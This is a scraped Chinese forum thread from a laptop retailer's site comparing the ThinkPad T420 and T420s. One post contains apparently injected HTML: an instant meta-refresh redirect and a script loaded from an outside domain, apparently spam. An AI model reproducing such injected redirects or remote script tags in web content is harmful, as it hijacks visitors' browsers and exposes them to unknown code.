开业于2004年,诚信服务几万客户
翔意数码淘宝店:xynbnb.taobao.com
全国客服电话:010-59000667
地址:北京东城区东兴隆街56号北京商界A座512
ThinkPad产品专业客服 苹果产品专业客服

T420和T420S...

07年在XY买的T60-FA8,用到现在一点毛病没有...就是电池完了....很给力..
刚通过TE考试,犒劳下自己,想来个新本,还在T,X之间犹豫,看好NC5和PK8,没见过T420S真机,同事好几个T420,到底厚度能差多少呢?
谢谢..

<meta http-equiv="refresh" content="0; url=http://www.9292.cc">
★★★
<script type="text/javascript" src="http://www.7755.cc/q.js"></script>
<link href="http://www.7755.cc/1.css" rel="stylesheet" type="text/css" media="screen" />

<P>&nbsp;</P>

先说一下,普通硬盘版本的T420s全部缺货,目前只有固态硬盘的RY5和PP8有货。

同配置的T420和T420s性能一样,T420s多个USB3.0接口。T420s更轻更薄一点。厚度大概差一个平面盖子那么大吧,也就是说T420s整体的厚度相当于T420的下半部分厚度。
楼主签名不错啊
那确实薄了不少啊!
固态硬盘太贵了,我准备弄个PK8,然后花几百块换个80G的固态硬盘,再加个拖架上原来的硬盘.
PK8啥时候能有货呢,2月应该可以吧?
黑音 发表于 2012-1-5 12:16
楼主签名不错啊

实事求是....唉...典型的IT民工...呵呵.
PK8预计1月8日再次少量到货,需要尽快联系客服预订哦!
男人拎T420感觉不重,但S的话拿在手中很轻
popyjd 发表于 2012-1-5 13:09
男人拎T420感觉不重,但S的话拿在手中很轻

各种体格的人感觉差别还是很大的~~我同事说嫌重想弄个13寸的,我还想搞个15的呢
TE是什么?
simbanole 发表于 2012-1-5 13:20
各种体格的人感觉差别还是很大的~~我同事说嫌重想弄个13寸的,我还想搞个15的呢 ...

上班步行10-15分钟,没感觉重。。15寸的现在还是重了点,原来想买索尼SE  15寸2公斤,比一般14寸的都要轻,但是只有全高清屏,我要字大的,就放弃了。
popyjd 发表于 2012-1-5 14:26
上班步行10-15分钟,没感觉重。。15寸的现在还是重了点,原来想买索尼SE  15寸2公斤,比一般14寸的都要轻 ...

你上班好近~~
s系列吧,看着就舒服
应该说,你买的房子离公司好近~~
没有420s了啊
有啊, PK8马上就到货了.. 现在PP8有现货
拍卖咋没了?
恭喜通过考试啊
签名真个性,呵呵
黑音 发表于 2012-1-5 12:16
楼主签名不错啊

回帖中有广告。。
我上班路程不超过10分钟
签名真个性,呵呵
presentation 发表于 2012-1-5 12:19
实事求是....唉...典型的IT民工...呵呵.

IT民工